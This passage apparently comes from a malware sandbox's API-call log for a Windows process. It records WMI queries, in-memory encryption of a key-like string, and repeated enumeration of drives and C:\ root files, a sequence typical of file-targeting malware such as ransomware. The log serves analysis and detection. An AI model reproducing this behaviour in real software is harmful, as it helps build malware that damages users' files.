[6]=0x0, [7]=0x46))) returned 0x0 [0243.948] WbemLocator:IUnknown:Release (This=0x73ff1c) returned 0x3 [0243.949] CoGetContextToken (in: pToken=0x26db50 | out: pToken=0x26db50) returned 0x0 [0243.949] CoGetContextToken (in: pToken=0x26df58 | out: pToken=0x26df58) returned 0x0 [0243.949] WbemLocator:IUnknown:QueryInterface (in: This=0x73ffbc, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dfe8 | out: ppvObject=0x26dfe8*=0x73ffa4) returned 0x0 [0243.949] WbemLocator:IRpcOptions:Query (in: This=0x73ffa4, pPrx=0x73ffbc, dwProperty=2, pdwValue=0x26e010 | out: pdwValue=0x26e010) returned 0x80004002 [0243.949] WbemLocator:IUnknown:Release (This=0x73ffa4) returned 0x3 [0243.949] WbemLocator:IUnknown:Release (This=0x73ffbc) returned 0x2 [0243.949] CoGetContextToken (in: pToken=0x26e530 | out: pToken=0x26e530) returned 0x0 [0243.949] CoGetContextToken (in: pToken=0x26e490 | out: pToken=0x26e490) returned 0x0 [0243.949] WbemLocator:IUnknown:QueryInterface (in: This=0x73ffbc, riid=0x26e560*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x26e55c | out: ppvObject=0x26e55c*=0x521089c) returned 0x0 [0243.949] IUnknown:AddRef (This=0x521089c) returned 0x4 [0243.949] IUnknown:Release (This=0x521089c) returned 0x3 [0243.949] IUnknown:Release (This=0x521089c) returned 0x2 [0243.949] WbemLocator:IUnknown:Release (This=0x521095c) returned 0x2 [0243.949] SysStringLen (param_1=0x0) returned 0x0 [0243.949] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210978, puCount=0x26e828 | out: puCount=0x26e828*=0x2) returned 0x0 [0243.949] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e824*=0x0, pszText=0x0 | out: puBuffLength=0x26e824*=0xf, pszText=0x0) returned 0x0 [0243.950] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e824*=0xf, pszText="00000000000000" | out: puBuffLength=0x26e824*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0243.950] CoGetContextToken (in: pToken=0x26e678 | out: pToken=0x26e678) returned 0x0 [0243.950] IUnknown:AddRef (This=0x521089c) returned 0x3 [0243.950] IEnumWbemClassObject:Clone (in: This=0x521089c, ppEnum=0x26e834 | out: ppEnum=0x26e834*=0x521cc24) returned 0x0 [0243.951] IUnknown:QueryInterface (in: This=0x521cc24, riid=0x75241104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e6f8 | out: ppvObject=0x26e6f8*=0x521cc28) returned 0x0 [0243.951] IClientSecurity:QueryBlanket (in: This=0x521cc28, pProxy=0x521cc24, pAuthnSvc=0x26e748, pAuthzSvc=0x26e744, pServerPrincName=0x26e73c, pAuthnLevel=0x26e740, pImpLevel=0x26e730, pAuthInfo=0x26e734, pCapabilites=0x26e738 | out: pAuthnSvc=0x26e748*=0xa, pAuthzSvc=0x26e744*=0x0, pServerPrincName=0x26e73c, pAuthnLevel=0x26e740*=0x6, pImpLevel=0x26e730*=0x2, pAuthInfo=0x26e734, pCapabilites=0x26e738*=0x1) returned 0x0 [0243.951] IUnknown:Release (This=0x521cc28) returned 0x1 [0243.951] IUnknown:QueryInterface (in: This=0x521cc24, riid=0x752410f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e6ec | out: ppvObject=0x26e6ec*=0x74055c) returned 0x0 [0243.951] IUnknown:QueryInterface (in: This=0x521cc24, riid=0x75241104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e6e8 | out: ppvObject=0x26e6e8*=0x521cc28) returned 0x0 [0243.951] IClientSecurity:SetBlanket (This=0x521cc28, pProxy=0x521cc24, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0243.953] IUnknown:Release (This=0x521cc28) returned 0x2 [0243.953] WbemLocator:IUnknown:Release (This=0x74055c) returned 0x1 [0243.953] CoTaskMemFree (pv=0x700f08) [0243.953] IUnknown:QueryInterface (in: This=0x521cc24, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e2d4 | out: ppvObject=0x26e2d4*=0x74055c) returned 0x0 [0243.953] WbemLocator:IUnknown:QueryInterface (in: This=0x74055c, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26e290 | out: ppvObject=0x26e290*=0x0) returned 0x80004002 [0243.954] WbemLocator:IUnknown:QueryInterface (in: This=0x74055c, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26e0ac | out: ppvObject=0x26e0ac*=0x0) returned 0x80004002 [0243.954] WbemLocator:IUnknown:AddRef (This=0x74055c) returned 0x3 [0243.954] WbemLocator:IUnknown:QueryInterface (in: This=0x74055c, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26dbec | out: ppvObject=0x26dbec*=0x0) returned 0x80004002 [0243.955] WbemLocator:IUnknown:QueryInterface (in: This=0x74055c, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26db9c | out: ppvObject=0x26db9c*=0x0) returned 0x80004002 [0243.955] WbemLocator:IUnknown:QueryInterface (in: This=0x74055c, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dba8 | out: ppvObject=0x26dba8*=0x7404bc) returned 0x0 [0243.955] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7404bc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26dbb0 | out: pCid=0x26dbb0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0243.955] WbemLocator:IUnknown:Release (This=0x7404bc) returned 0x3 [0243.955] CoGetContextToken (in: pToken=0x26dc08 | out: pToken=0x26dc08) returned 0x0 [0243.955] CoGetContextToken (in: pToken=0x26e010 | out: pToken=0x26e010) returned 0x0 [0243.955] WbemLocator:IUnknown:QueryInterface (in: This=0x74055c, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e0a0 | out: ppvObject=0x26e0a0*=0x740544) returned 0x0 [0243.955] WbemLocator:IRpcOptions:Query (in: This=0x740544, pPrx=0x74055c, dwProperty=2, pdwValue=0x26e0c8 | out: pdwValue=0x26e0c8) returned 0x80004002 [0243.956] WbemLocator:IUnknown:Release (This=0x740544) returned 0x3 [0243.956] WbemLocator:IUnknown:Release (This=0x74055c) returned 0x2 [0243.956] CoGetContextToken (in: pToken=0x26e5e8 | out: pToken=0x26e5e8) returned 0x0 [0243.956] CoGetContextToken (in: pToken=0x26e548 | out: pToken=0x26e548) returned 0x0 [0243.956] WbemLocator:IUnknown:QueryInterface (in: This=0x74055c, riid=0x26e618*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x26e614 | out: ppvObject=0x26e614*=0x521cc24) returned 0x0 [0243.956] IUnknown:AddRef (This=0x521cc24) returned 0x4 [0243.956] IUnknown:Release (This=0x521cc24) returned 0x3 [0243.956] IUnknown:Release (This=0x521cc24) returned 0x2 [0243.956] IUnknown:Release (This=0x521089c) returned 0x2 [0243.956] SysStringLen (param_1=0x0) returned 0x0 [0243.956] IEnumWbemClassObject:Reset (This=0x521cc24) returned 0x0 [0243.957] CoTaskMemAlloc (cb=0x4) returned 0x768198 [0243.957] IEnumWbemClassObject:Next (in: This=0x521cc24, lTimeout=-1, uCount=0x1, apObjects=0x768198, puReturned=0x6df2e0c | out: apObjects=0x768198*=0x0, puReturned=0x6df2e0c*=0x0) returned 0x1 [0245.667] CoTaskMemFree (pv=0x768198) [0245.668] CoGetContextToken (in: pToken=0x26e760 | out: pToken=0x26e760) returned 0x0 [0245.668] WbemLocator:IUnknown:Release (This=0x74055c) returned 0x1 [0245.668] IUnknown:Release (This=0x521cc24) returned 0x0 [0245.673] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧鴘ထ䥹럅?ꁅ龁鳁擑蚺嬁^鱤岨") returned 0x20 [0245.674] SystemFunction041 (in: Memory=0x6f0ab4, MemorySize=0x40, OptionFlags=0x0 | out: Memory=0x6f0ab4) returned 0x0 [0245.674] SysStringLen (param_1="T3m#CEr&ruTmvN&43XGqQRC}R0vU{[3B") returned 0x20 [0245.674] SystemFunction040 (in: Memory=0x6f0ab4, MemorySize=0x40, OptionFlags=0x0 | out: Memory=0x6f0ab4) returned 0x0 [0245.674] SysStringLen (param_1="T3m#CEr&ruTmvN&43XGqQRC}R0vU{[3B") returned 0x20 [0245.674] SysStringLen (param_1="T3m#CEr&ruTmvN&43XGqQRC}R0vU{[3B") returned 0x20 [0245.714] GetLogicalDrives () returned 0x4 [0245.714] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26e410, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0245.714] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e924) returned 1 [0245.714] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26e9a0 | out: lpFileInformation=0x26e9a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xbdb8fd0, ftLastAccessTime.dwHighDateTime=0x1d6f0d1, ftLastWriteTime.dwLowDateTime=0xbdb8fd0, ftLastWriteTime.dwHighDateTime=0x1d6f0d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0245.714] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e920) returned 1 [0245.715] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0246.423] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0246.424] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0246.424] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0246.483] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 0x6d28e8 [0246.484] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0246.484] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0246.484] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0246.484] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0246.484] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0x0, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0246.485] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0246.485] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xaece4da0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0246.485] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0246.485] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe1939e20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe1939e20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0246.485] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0246.485] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0246.485] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0246.486] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0246.486] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0246.486] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0246.486] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0246.486] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0246.486] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0246.486] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0246.487] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0246.487] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0246.487] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0246.487] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 0x6d28e8 [0246.487] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0246.488] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0246.488] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0246.488] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0246.488] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0246.488] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0246.488] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xaece4da0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0246.488] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 